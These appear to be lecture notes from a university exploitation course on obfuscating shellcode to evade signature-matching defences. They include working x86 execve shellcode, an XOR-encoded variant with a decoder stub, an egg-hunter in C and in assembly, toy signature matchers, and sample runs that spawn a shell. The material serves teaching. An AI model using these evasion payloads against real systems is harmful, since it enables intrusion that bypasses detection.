Lec. 13: Obfuscating Shell Code and Egg Hunting
Table of Contents
1 Signature Matching Defenses
Continuing our discussion of advanced shell code. In the last class we reduced the size of our shell code from 37 bytes to 21, but sometimes it is not the size of the shell code, but the content. For example, modern intrusion detection systems may scan the contents of program for "/bin/sh" or even "sh" to try and stop shell code. Here's a really simple example code:
#include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char * argv[]){ if(argc < 2){ printf("ERROR: Require argument\n"); exit(1); } char * p; for(p=argv[1];*p;p++){ //check for any "sh" so not to be exploited! if (strncmp(p,"sh",2) == 0){ printf("No way Jose!\n"); exit(2); } } //execute as binary code ((void(*)(void)) argv[1])(); return; }
This code will balk whenever the input string contains the word "sh" as needed for our shell code.
As you can see, in our 21 byte shell code, we are going to have a problem getting passed the signature:
user@si485H-base:demo$ ./sig_matcher $(printf `./hexify.sh smallest_shell`) No way Jose!
This is a toy example, but such a program could compare against any kind of input type to match shell code. This is called signature matching and it is a common defense to prevent exploits. Here's a more complex signature matching scheme:
user@si485H-base:demo$ cat execve_sigmatcher.c #include <stdio.h> #include <stdlib.h> #include <string.h> //check for the sig0 start finished by sig1 in str int check_sig(char *str, char * sig0,char *sig1){ char *p,*q; for(p=str;*p;p++){ //checking for start of signature if ( strncmp(p,sig0,strlen(sig0)) == 0 ){ //checking for end of signature for(q=p;*q;q++){ if (strncmp(q,sig1,strlen(sig1)) == 0){ return 1;//found signature } } } } return 0; //did not find signautre } int main(int argc, char * argv[]){ if(argc < 2){ printf("ERROR: Require argument\n"); exit(1); } // mov al,0xb int 0x80 if ( check_sig(argv[1], "\xb0\x0b", "\xcd\x80") || // xor ecx,ecx int 0x80 check_sig(argv[1], "\x31\xc9", "\xcd\x80")){ printf("No Way Jose!\n"); exit(2); } //execute as binary code ((void(*)(void)) argv[1])(); return; }
In this scheme, the signature is looking for some possibly shell code
indicative instruction, like mov al, 0xb
or xor ecx,ecx
which is
followed by an int 0x80
at some point later. This signature is,
clearly, a lot harder to defeat with the shell code we've been using
so far. What to do?!
2 Obfuscating Shell Code
In the community, it is generally considered that signature matching schemes can be easily defeated with obfuscated and polymorphic shell code. In these variants, the shell code is some how changed dynamically such that it will pass a signature matching scheme.
We will focus on simple obfuscated shell code scheme which will encode the shell code portion the program and then use a decoder to decode the shell code prior to execution. You can imagine expanding this scheme to polymorphic shell code, where by each version of the shell code changes … but that might be a discussion for another day (or year).
2.1 Simple Push Based Obfuscation
To start, let's make the observation that we can rewrite our shell
code for our 21 byte shell code using a series of push commands
followed by a call to esp
(or a jmp).
Here are the bytes to our small shell code from objdump:
8048060: 31 c9 xor ecx,ecx 8048062: f7 e1 mul ecx 8048064: 50 push eax 8048065: 68 6e 2f 73 68 push 0x68732f6e 804806a: 68 2f 2f 62 69 push 0x69622f2f 804806f: 89 e3 mov ebx,esp 8048071: b0 0b mov al,0xb 8048073: cd 80 int 0x80
First, I want to conver this into little-endian encode 4-byte
sequences that I can push onto the stack. I've written a script to do
this le-foourbyte.py
and is provided in the classed tools
directory. Here's an example of using it on this shell code:
user@si485H-base:demo$ printf $(./hexify.sh smallest_shell) | ./le-fourbytes.py - 0xe1f7c931 0x2f6e6850 0x2f686873 0x8969622f 0xcd0bb0e3 0x90909080
As you can see, if you look closely, that all the bytes are there encoded into little endian.
Now, to use this in another version of the shell code, we will want
push in reverse order, and we can use the tac
command (cat
backwards) to print this in reverse:
user@si485H-base:demo$ printf $(./hexify.sh smallest_shell) | ./le-fourbytes.py - | tac 0x90909080 0xcd0bb0e3 0x8969622f 0x2f686873 0x2f6e6850 0xe1f7c931
And, then we can dump this into some shell code:
section .text global _start _start: push 0x90909080 push 0xcd0bb0e3 push 0x8969622f push 0x2f686873 push 0x2f6e6850 push 0xe1f7c931 call esp
And now, we pass the simple sigchecks from before because we split up
the int 0x80
instruction bytes.
user@si485H-base:demo$ ./execve_sigmatcher $(printf `./hexify.sh push_shell`) $
But, surprisingly, we still fail the more naive checking for "sh"
user@si485H-base:demo$ ./simple_sigmatcher $(printf `./hexify.sh push_shell`) No way Jose!
We need to do a bit more work.
2.2 Decoder Obfuscated Shell Code
The next step in obfuscation is to actually encode the bytes of the
shell code in some way, push them onto the stack, and then decode them
at run time. We will use a very basic encoding scheme that will xor
the bytes with a key. It's important that the key does not exist in
the shell code, otherwise we may introduce a null byte.
I don't see any 0xFF in the shell code, so we will use that as the
key, essentially inverting the bytes. The le-fourbytes.py
script
will do this too:
user@si485H-base:demo$ printf $(./hexify.sh smallest_shell) | ./le-fourbytes.py - 0xFF | tac 0x6f6f6f7f 0x32f44f1c 0x76969dd0 0xd097978c 0xd09197af 0x1e0836ce
That looks good. Now, all we need to do is write a decoder in assembly
that will step through and invert all the bytes on the stack before
calling esp
.
SECTION .text global _start _start: ;; push encoded shell code push 0x6f6f6f7f push 0x32f44f1c push 0x76969dd0 push 0xd097978c push 0xd09197af push 0x1e0836ce ;24=6*4 bytes long ;; DECODER xor eax,eax, ;zero out eax xor ecx,ecx ;zerp out ecx mov cl,0x18 ;set ecx to 24, length of shell code decode: mov al,[esp+ecx-1] ;load byte at front int al xor al,0xff ;decode byte mov [esp+ecx-1],al ;write byte back loop decode ;decrement ecx and jmp to decode until ecx is zero call esp ;call esp to execute shell code
There are few new assembly instructions, but most should be
familiar. The new instruction is loop
, which will do an condition
jump based on the value of ecx
register and also decrement
ecx
. Once ecx
is zero, it will no longer jump.
In total, this shell code is one part pushing on the encoded shell
code and one part decoding that shell code. Once the shell code is
decoded, we can call esp
and execute the shell code.
user@si485H-base:demo$ ./encoded_shell $
And this will pass all our signature matchers:
user@si485H-base:demo$ ./simple_sigmatcher $(printf `./hexify.sh encoded_shell`) $ user@si485H-base:demo$ ./execve_sigmatcher $(printf `./hexify.sh encoded_shell`) $
But, you might be thinking, wait, couldn't write signatures that match the decoder? Of course, but then we can write more obfuscated decoders, and then they can write signatures for that, and we obfuscate again, and then more signatures, etc. This is why a signature scheme will always fail in the long run.
3 Egg-Hunt Shell Code
Let's consider another technique for subverting signature matching scheme called the egg hunt. In the egg hunt, we consider a scenario where we can't easily upload our shell code in a way that will execute. This could occur because either there isn't enough space in the overflow buffer for the shell code, or that there are good signature matching schemes in place. Either way, we are currently hosed in getting our shell code to execute directly.
However, all may not be loss. Even if we can't get our shell code to execute, we may be able to get it into the memory address space of the program and get some other piece of code to execute for the buffer overrun, one that fits in the buffer or doesn't match a current signature. The challenge now is, how do we eventually execute our shell code? And, more precisely, how do we find it in memory?
This is the so called "egg hunt!" What we can do is plant an egg in our shell code, and have another piece of software search the entire memory address space searching for it.
3.1 Determining a Good Egg
A good egg should have two properties: (1) it should consist of nop
like instructions so that it doesn't affect the shell code, and (2),
it should be doubled.
For the first, a typical egg that we will use is 0x50905090. You'll
notice that byte 0x90 is a nop, and 0x50 is incr eax
so essentially
a nop. This is a nice egg because once we find the egg, we want to jmp
to that execution.
The other important part of an egg, is that it must apear twice. For example, here is are huntable shell code:
SECTION .text ; Code section global _start ; Make label available to linker _start: db 0x50,0x90,0x50,0x90 ; egg target db 0x50,0x90,0x50,0x90 xor ecx,ecx mul ecx ;0's edx and and eax push eax ;\0 push 0x68732f6e ;n/sh push 0x69622f2f ;//bi mov ebx,esp ; Param #1 - "/bin/sh" is *esp mov al,0xb ; System call number for execve int 0x80 ; Interrupt 80 hex - invoke system call
The reason it must apear in duplicate is that the egg hunt shell code must also have a copy of the egg because it will be using it in a comparison. Thus, to differentiate the egg hunter from its pray, the pray has the egg twice.
3.2 How to Hunt and Egg
With the egg figured out and our huntable shell code, let's focus our attention on the egg unter. For this, we need two processes:
- We need to be able to iterate through the entire memory address space, from 0x0000000 to 0xFFFFFFFFF, FAST!
- We need to be able to see if an address can be dereferenced without causing a segmentation fault.
For (1), we need to think about how memory is aligned. Each memory region is broken into pages, and pages are bounded by 1024 bytes. This means that we jump by 1024 bytes for each address if the address is not referenced.
For (2), this is a bit more tricky. We can't just dereference the
address ourselves because that will cause a segfault
, but we might be
able to ask the operating system to check. The access()
system call
is exactly the right tool for this job.
Normally, access
will check if you have access to the specified
file. Here' is the manual description:
SYNOPSIS #include <unistd.h> int access(const char *pathname, int mode); DESCRIPTION access() checks whether the calling process can access the file pathname. If pathname is a symbolic link, it is dereferenced.
We hand it a path name as a reference to a string, an address, and the
operating system will dereference that address. If the address is not
accesible, the system call will fail with EFAULT
EFAULT pathname points outside your accessible address space.
BUT, it will not segfault! So we can use access()
to hunt out
accessible address spaces. Here's some C code that does that, and once
it finds the egg, it executes it.
#include <stdio.h> #include <unistd.h> #include <errno.h> int main(int argc, char *argv[]){ unsigned int p = 0x0000000; unsigned int egg = 0x90509050; //egg hunt while(1){ //peform an acess access( (char *) p+4, 0); //check if we EFAULT or not (readible memory or not) if ( errno != EFAULT){ //treat p as a integer pointer unsigned int * q = (unsigned int *) p; //check for egg twice in a row if (q[0] == 0x90509050 && q[1] == 0x90509050){ //execute the shell code if found ((void(*)(void)) q)(); } p++; }else{ //if segfaulting move at page boundry p |= 0xfff; //1 out last 12 bits, p += 1; //add 1 to cause an overflow to move in 4096 boundaries } } }
And if we run this dummy code like so:
user@si485H-base:demo$ ./dummy_hunt $(printf $(./hexify.sh huntable_shell))
The huntableshell is a command line argument, which means it is loaded into the memory of the program. The egg hunter will find the shell code, eventually, and drop us into the shell. How long does it take?
user@si485H-base:demo$ time ./dummy_hunt $(printf $(./hexify.sh huntable_shell)) < /dev/null real 0m9.038s user 0m0.628s sys 0m6.568s
That long. Which is pretty fast, but not soo fast.
3.3 Putting it all together
Ok, now that we have a sense of how to hunt an egg, let's translate that logic into assembly and write an egg hunt shell code:
SECTION .text global _start _start: mov ebx, 0x90509050 ;store value of egg xor ecx,ecx ;clear registers ecx mul ecx ;clear register edx,eax j1: or dx,0xfff ;move in page boundaries by 4096 byte boundaries j2: inc edx, ; move by 1 pusha ;save registers on stack lea ebx,[edx+0x4] ;load address 4 bytes for ebx mov al,0x21 ;set up access() int 0x80 ;system call cmp al,0xf2 ;compare to -14 EFAULT popa ;restore register state from stack jz j1 ;if EFAULT, move in page boundary cmp [edx],ebx ;check for first egg jnz j2 ;jump if not there cmp [edx+0x4],ebx ;check for second egg jnz j2 ;jump if not there jmp edx ;found egg, jump to egg
Now, we can use our dummy exploit, with our egg hunt shell code and our huntable shell code to see it work together:
./dummy_exploit $(printf $(./hexify.sh egg_hunt)) $(printf $(./hexify.sh huntable_shell))
The first argument will be executed by the dummyexploit program, which will find the huntable shell code, the second argument. How long does it take?
user@si485H-base:demo$ time ./dummy_exploit $(printf $(./hexify.sh egg_hunt)) $(printf $(./hexify.sh huntable_shell)) < /dev/null real 0m10.775s user 0m1.776s sys 0m7.192s
Notice, most of that is the system call. And, if you run this with strace, you can see that happening.
user@si485H-base:demo$ strace -e raw=access ./dummy_exploit $(printf $(./hexify.sh egg_hunt)) $(printf $(./hexify.sh huntable_shell)) ccess(0x8ed2004, 0) = -1 (errno 14) access(0x8ed3004, 0) = -1 (errno 14) access(0x8ed4004, 0) = -1 (errno 14) access(0x8ed5004, 0) = -1 (errno 14) access(0x8ed6004, 0) = -1 (errno 14) access(0x8ed7004, 0) = -1 (errno 14) access(0x8ed8004, 0) = -1 (errno 14) access(0x8ed9004, 0) = -1 (errno 14) access(0x8eda004, 0) = -1 (errno 14) access(0x8edb004, 0) = -1 (errno 14) access(0x8edc004, 0) = -1 (errno 14) access(0x8edd004, 0) = -1 (errno 14) access(0x8ede004, 0) = -1 (errno 14) access(0x8edf004, 0) = -1 (errno 14) access(0x8ee0004, 0) = -1 (errno 14) access(0x8ee1004, 0) = -1 (errno 14) access(0x8ee2004, 0) = -1 (errno 14) access(0x8ee3004, 0) = -1 (errno 14) access(0x8ee4004, 0) = -1 (errno 14) access(0x8ee5004, 0) = -1 (errno 14) access(0x8ee6004, 0) = -1 (errno 14) access(0x8ee7004, 0) = -1 (errno 14) access(0x8ee8004, 0) = -1 (errno 14) access(0x8ee9004, 0) = -1 (errno 14) access(0x8eea004, 0) = -1 (errno 14) access(0x8eeb004, 0) = -1 (errno 14) access(0x8eec004, 0) = -1 (errno 14) (...)
Pausing … this is moving at the page boundary, every 4096 bytes. This region of memory is not accessible, but eventually …
(...) ccess(0xb7e38d2c, 0) = -1 (errno 2) access(0xb7e38d2d, 0) = -1 (errno 2) access(0xb7e38d2e, 0) = -1 (errno 2) access(0xb7e38d2f, 0) = -1 (errno 2) access(0xb7e38d30, 0) = -1 (errno 2) access(0xb7e38d31, 0) = -1 (errno 2) access(0xb7e38d32, 0) = -1 (errno 2) access(0xb7e38d33, 0) = -1 (errno 2) access(0xb7e38d34, 0) = -1 (errno 2) access(0xb7e38d35, 0) = -1 (errno 2) access(0xb7e38d36, 0) = -1 (errno 2) access(0xb7e38d37, 0) = -1 (errno 2) access(0xb7e38d38, 0) = -1 (errno 2) access(0xb7e38d39, 0) = -1 (errno 2) access(0xb7e38d3a, 0) = -1 (errno 2) access(0xb7e38d3b, 0) = -1 (errno 2) access(0xb7e38d3c, 0) = -1 (errno 2) access(0xb7e38d3d, 0) = -1 (errno 2) access(0xb7e38d3e, 0) = -1 (errno 2) access(0xb7e38d3f, 0) = -1 (errno 2) access(0xb7e38d40, 0) = -1 (errno 2) access(0xb7e38d41, 0) = -1 (errno 2) access(0xb7e38d42, 0) = -1 (errno 2) access(0xb7e38d43, 0) = -1 (errno 2) access(0xb7e38d44, 0) = -1 (errno 2) access(0xb7e38d45, 0) = -1 (errno 2) access(0xb7e38d46, 0) = -1 (errno 2) access(0xb7e38d47, 0) = -1 (errno 2) access(0xb7e38d48, 0) = -1 (errno 2) (...)
You get a region of memory that is accessible, and then you move 1 byte at a type through it checking for the egg. Finally, at some point you find that egg, and you eat it -— I mean you execute the shell.